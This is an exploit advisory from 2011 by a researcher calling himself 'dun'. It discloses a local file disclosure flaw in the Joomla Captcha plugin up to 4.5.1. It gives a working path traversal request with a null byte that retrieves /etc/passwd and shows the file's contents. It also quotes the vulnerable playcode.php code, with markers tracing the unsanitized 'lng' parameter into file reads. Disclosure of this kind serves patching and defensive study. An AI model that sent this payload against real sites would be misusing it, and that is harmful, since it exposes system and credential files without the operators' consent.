:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
 
#############################################################################
#  [ Joomla Captcha Plugin <= 4.5.1 ]  Local File Disclosure Vulnerability  #
#############################################################################
#
# Script: "Joomla Captcha plugin and patch for Joomla!"
#
# Script site: http://www.kupala.net/
# Download: http://code.google.com/p/joomla15captcha/
#
#
# [LFI] (magic_quotes_gpc = Off)
# Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
#       dun@radius ~ $ cat joomlacaptcha.mp3
#       root:x:0:0:root:/root:/bin/bash
#       ......
#
# File: ./plugins/system/captcha/playcode.php
#
#     79   if (!$captchacode) $captchacode = '0000000000';                                
#     80  
#     81   session_write_close();
#     82  
#     83   @$lng = $_GET['lng'];                                                 // [1]
#     84   if ( !$lng ) $lng = 'en-gb';
#     85  
#     86   $captchafilename = "joomlacaptcha.mp3";
#     87   $captchalength = strlen( $captchacode );
#     88  
#     89   $outlength = 0;
#     90   $reallength = 0;
#     91   $currsize = 0;
#     92   $outstream = '';
#     93  
#     94   if ($captchalength > 0) {
#     95       for ($i = 0; $i < $captchalength; $i++) {
#     96           $soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3';   // [2]
#     97       }
#     98       foreach ($soundfiles as $onefile){                                     //
#     99           if (file_exists( $onefile )) {                                 //
#    100               $instream = fopen( $onefile, 'rb' );                   //
#    101               $currsize = filesize( $onefile );                      // [3]
#    102               $outstream .= fread( $instream, $currsize );           //
#    103               $outlength += $currsize;                               //
#    104               fclose( $instream );                                   //
#    105               $reallength += 1;                                      //
#    106           }
#    107       }
#    108   }
#    109  
#    110   if (($outstream == '') || ($captchalength != $reallength)) {
#    111           $outstream = 0; $outlength = 1;
#    112   }
#    113  
#    114   ob_start();
#    115   header( 'Content-Type: audio/x-mpeg');                                         //
#    116   header( "Content-Disposition: attachment; filename=$captchafilename;");        //
#    117   header( 'Content-Transfer-Encoding: binary');                                  //
#    118   header( 'Content-Length: '.$outlength);                                        //
#    119   echo $outstream ;                                                              // [4] LFD
#    120   ob_end_flush();
#
#
# [ dun / 2011-01-09 ]